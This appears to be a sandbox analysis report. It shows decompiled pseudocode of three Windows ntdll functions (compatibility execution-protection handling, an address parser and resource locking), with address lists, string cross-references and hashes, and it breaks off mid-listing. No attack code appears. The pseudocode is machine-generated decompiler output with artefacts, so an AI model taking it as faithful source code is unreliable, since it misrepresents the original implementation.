                                                        Function 00B77EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E00B77EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xc22088; // 0x76fbb2c1
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00B77F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00B93F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00B4DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xc24218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00B93F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00B50D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00B93F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00B58375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00B93F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00BBE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00B93F92();
					_t38 = 1;
					L2:
					return E00B4E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                        0x00b77f08
                                                        0x00b77f0f
                                                        0x00b77f12
                                                        0x00b77f1b
                                                        0x00b77f31
                                                        0x00b93ead
                                                        0x00b93eb4
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93eba
                                                        0x00b93ecd
                                                        0x00b93ed2
                                                        0x00b93ee1
                                                        0x00b93ee7
                                                        0x00b93eec
                                                        0x00b93f12
                                                        0x00b93f18
                                                        0x00b93f1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93f20
                                                        0x00b93f26
                                                        0x00b93f28
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93f2e
                                                        0x00b93f30
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93f3a
                                                        0x00b93f3b
                                                        0x00b93f53
                                                        0x00b93f64
                                                        0x00b93f69
                                                        0x00b93f6c
                                                        0x00b93f6d
                                                        0x00b93f6f
                                                        0x00b9e304
                                                        0x00b9e30f
                                                        0x00b9e315
                                                        0x00b9e31e
                                                        0x00b9e321
                                                        0x00b9e327
                                                        0x00b9e329
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9e32f
                                                        0x00b9e32f
                                                        0x00b9e337
                                                        0x00b9e33a
                                                        0x00b9e33b
                                                        0x00b9e33d
                                                        0x00b9e33f
                                                        0x00b9e341
                                                        0x00b9e341
                                                        0x00b9e34e
                                                        0x00b9e353
                                                        0x00b9e358
                                                        0x00b9e35d
                                                        0x00b9e35f
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9e365
                                                        0x00b9e365
                                                        0x00b9e368
                                                        0x00b9e36e
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9e374
                                                        0x00b9e32f
                                                        0x00b93f75
                                                        0x00b93f7a
                                                        0x00b93f7c
                                                        0x00b93f7e
                                                        0x00b93f86
                                                        0x00b77f39
                                                        0x00b77f47
                                                        0x00b77f47
                                                        0x00b77f37
                                                        0x00b77f37
                                                        0x00000000

                                                        APIs
                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B93F12
                                                        Strings
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B93F75
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B93EC4
                                                        • ExecuteOptions, xrefs: 00B93F04
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B9E345
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B9E2FB
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B93F4A
                                                        • Execute=1, xrefs: 00B93F5E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: BaseDataModuleQuery
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 3901378454-484625025
                                                        • Opcode ID: 42c37a44a3630d9a053616ab1525b3885e70b09afc6c8ffd97459186ced183d7
                                                        • Instruction ID: a99b4f40ac2215f913c748046992d2964088fef7006c3251bacb43abb7776f38
                                                        • Opcode Fuzzy Hash: 42c37a44a3630d9a053616ab1525b3885e70b09afc6c8ffd97459186ced183d7
                                                        • Instruction Fuzzy Hash: 2741B371A8021CBBDF209B94DCD6FEA73FCAF14700F0045E9F519A6091EA709B459B61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B80B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B80B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00B58980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00B4DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00B80CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00B80CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00B806BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00B806BA(_t135, _t178) == 0 || E00B80A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00B80CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00B80CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00B806BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00B806BA(_t124, _t142) == 0 || E00B80A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                        0x00b80b21
                                                        0x00b80b24
                                                        0x00b80b27
                                                        0x00b80b2a
                                                        0x00b80b2d
                                                        0x00b80b30
                                                        0x00b80b33
                                                        0x00b80b36
                                                        0x00b80b39
                                                        0x00b80b3e
                                                        0x00b80c65
                                                        0x00b80c68
                                                        0x00b80c6a
                                                        0x00b80c6f
                                                        0x00baeb42
                                                        0x00000000
                                                        0x00000000
                                                        0x00baeb48
                                                        0x00baeb48
                                                        0x00b80c75
                                                        0x00b80c7a
                                                        0x00baeb54
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00baeb5a
                                                        0x00b80c80
                                                        0x00b80c84
                                                        0x00baeb98
                                                        0x00000000
                                                        0x00000000
                                                        0x00baeba6
                                                        0x00b80cb8
                                                        0x00b80cba
                                                        0x00b80cd3
                                                        0x00b80cda
                                                        0x00b80ce4
                                                        0x00b80ce9
                                                        0x00000000
                                                        0x00b80cec
                                                        0x00b80c8c
                                                        0x00baeb63
                                                        0x00000000
                                                        0x00000000
                                                        0x00baeb70
                                                        0x00baeb75
                                                        0x00baeb7d
                                                        0x00000000
                                                        0x00000000
                                                        0x00baeb8c
                                                        0x00000000
                                                        0x00baeb8c
                                                        0x00b80c96
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80ca2
                                                        0x00b80cac
                                                        0x00b80cb4
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80b44
                                                        0x00b80b47
                                                        0x00b80b49
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80b4f
                                                        0x00b80b50
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80b56
                                                        0x00b80b62
                                                        0x00b80b7c
                                                        0x00b80bac
                                                        0x00b80a0f
                                                        0x00baeaaa
                                                        0x00000000
                                                        0x00baeac4
                                                        0x00baeac4
                                                        0x00b80bd0
                                                        0x00b80bd0
                                                        0x00b80bd4
                                                        0x00b80bd9
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80bdb
                                                        0x00b80be0
                                                        0x00baeb0e
                                                        0x00b80a1a
                                                        0x00000000
                                                        0x00b80a1a
                                                        0x00baeb1a
                                                        0x00baeb1f
                                                        0x00baeb27
                                                        0x00000000
                                                        0x00000000
                                                        0x00baeb36
                                                        0x00000000
                                                        0x00baeb36
                                                        0x00b80bea
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80bf6
                                                        0x00b80c00
                                                        0x00b80c03
                                                        0x00b80c0b
                                                        0x00000000
                                                        0x00b80c0b
                                                        0x00baeaaa
                                                        0x00000000
                                                        0x00b80a15
                                                        0x00b80bb6
                                                        0x00000000
                                                        0x00b80bc6
                                                        0x00b80bc6
                                                        0x00b80bcb
                                                        0x00b80c15
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80c1d
                                                        0x00b80c20
                                                        0x00b80c21
                                                        0x00b80c24
                                                        0x00b80c24
                                                        0x00b80c26
                                                        0x00000000
                                                        0x00b80c26
                                                        0x00b80bcd
                                                        0x00000000
                                                        0x00b80bcd
                                                        0x00b80b89
                                                        0x00b80b89
                                                        0x00b80b90
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80b96
                                                        0x00000000
                                                        0x00b80b96
                                                        0x00b80a04
                                                        0x00b80a04
                                                        0x00b80b9a
                                                        0x00b80b9a
                                                        0x00b80b9b
                                                        0x00b80b9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80ba5
                                                        0x00b80ac7
                                                        0x00b80aca
                                                        0x00baeacf
                                                        0x00000000
                                                        0x00baeade
                                                        0x00baeade
                                                        0x00baeae3
                                                        0x00000000
                                                        0x00000000
                                                        0x00baeaf3
                                                        0x00baeaf6
                                                        0x00baeaf7
                                                        0x00baeafe
                                                        0x00baeb01
                                                        0x00000000
                                                        0x00baeb01
                                                        0x00baeacf
                                                        0x00b80ad0
                                                        0x00b80ad4
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80ada
                                                        0x00b80ae6
                                                        0x00b80c34
                                                        0x00000000
                                                        0x00b80c47
                                                        0x00b80c49
                                                        0x00b80c4a
                                                        0x00b80c4e
                                                        0x00b80c51
                                                        0x00b80c54
                                                        0x00b80c57
                                                        0x00b80c5a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b80c60
                                                        0x00b80afb
                                                        0x00b80afe
                                                        0x00b80b02
                                                        0x00b80b05
                                                        0x00b80b08
                                                        0x00000000
                                                        0x00b80b08
                                                        0x00b80ae6
                                                        0x00b80b44
                                                        0x00b809f8
                                                        0x00b809f8
                                                        0x00b809f9
                                                        0x00000000
                                                        0x00000000
                                                        0x00baeaa0
                                                        0x00000000

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID: .$:$:
                                                        • API String ID: 3965848254-2308638275
                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction ID: 869d2ac79ee744b81cea8c7edb310d99615b494688bca63cf6be48264a2bbf88
                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction Fuzzy Hash: FBA1BF3192430ADFDBA4FF54C8856BEBBF4EF05384F2485EAD812A7261D6309A49CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B80554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 50%
                                                        			E00B80554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c201c0;
									_push(_t144);
									_push(0);
									_t51 = E00B3F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00B84FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00B93F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00B93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00BC217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00B93F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00B83915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c201c0;
												_push(_t138);
												_push(0);
												_t58 = E00B3F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00B84FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00B93F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00B93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00BC217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00B93F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00B83915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00B65384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00B3F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00B83915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00B3F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00B83915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00B3F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00B83915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00B65329(_t110, _t138);
																_t69 = E00B653A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                        0x00b8055a
                                                        0x00b8055d
                                                        0x00b80563
                                                        0x00b80566
                                                        0x00b805d8
                                                        0x00b805e2
                                                        0x00b805e5
                                                        0x00000000
                                                        0x00b805e7
                                                        0x00b805e7
                                                        0x00b805ea
                                                        0x00b805f3
                                                        0x00b805f3
                                                        0x00b80568
                                                        0x00b80568
                                                        0x00b80568
                                                        0x00b80569
                                                        0x00b80569
                                                        0x00b80569
                                                        0x00b8056b
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba217f
                                                        0x00ba2183
                                                        0x00ba225b
                                                        0x00ba225f
                                                        0x00ba2189
                                                        0x00ba218c
                                                        0x00ba218f
                                                        0x00ba2194
                                                        0x00ba2199
                                                        0x00ba219d
                                                        0x00ba21a0
                                                        0x00ba21a2
                                                        0x00ba21ce
                                                        0x00ba21ce
                                                        0x00ba21ce
                                                        0x00ba21d0
                                                        0x00ba21d6
                                                        0x00ba21de
                                                        0x00ba21e2
                                                        0x00ba21e8
                                                        0x00ba21e9
                                                        0x00ba21ec
                                                        0x00ba21f1
                                                        0x00ba21f6
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba21f8
                                                        0x00ba21fb
                                                        0x00ba2206
                                                        0x00ba220b
                                                        0x00ba220c
                                                        0x00ba2217
                                                        0x00ba2226
                                                        0x00ba222b
                                                        0x00ba222c
                                                        0x00ba222f
                                                        0x00ba2232
                                                        0x00ba2235
                                                        0x00ba2235
                                                        0x00ba223a
                                                        0x00ba223f
                                                        0x00ba2241
                                                        0x00ba2243
                                                        0x00ba2248
                                                        0x00ba2248
                                                        0x00ba224d
                                                        0x00ba224f
                                                        0x00ba2262
                                                        0x00ba2263
                                                        0x00ba2268
                                                        0x00ba2269
                                                        0x00ba2269
                                                        0x00ba2269
                                                        0x00ba226d
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba2276
                                                        0x00ba2279
                                                        0x00ba227e
                                                        0x00ba2283
                                                        0x00ba2287
                                                        0x00ba228a
                                                        0x00ba228d
                                                        0x00ba228f
                                                        0x00ba22bc
                                                        0x00ba22bc
                                                        0x00ba22bc
                                                        0x00ba22be
                                                        0x00ba22c4
                                                        0x00ba22cc
                                                        0x00ba22d0
                                                        0x00ba22d6
                                                        0x00ba22d7
                                                        0x00ba22da
                                                        0x00ba22df
                                                        0x00ba22e4
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22e6
                                                        0x00ba22e9
                                                        0x00ba22f4
                                                        0x00ba22f9
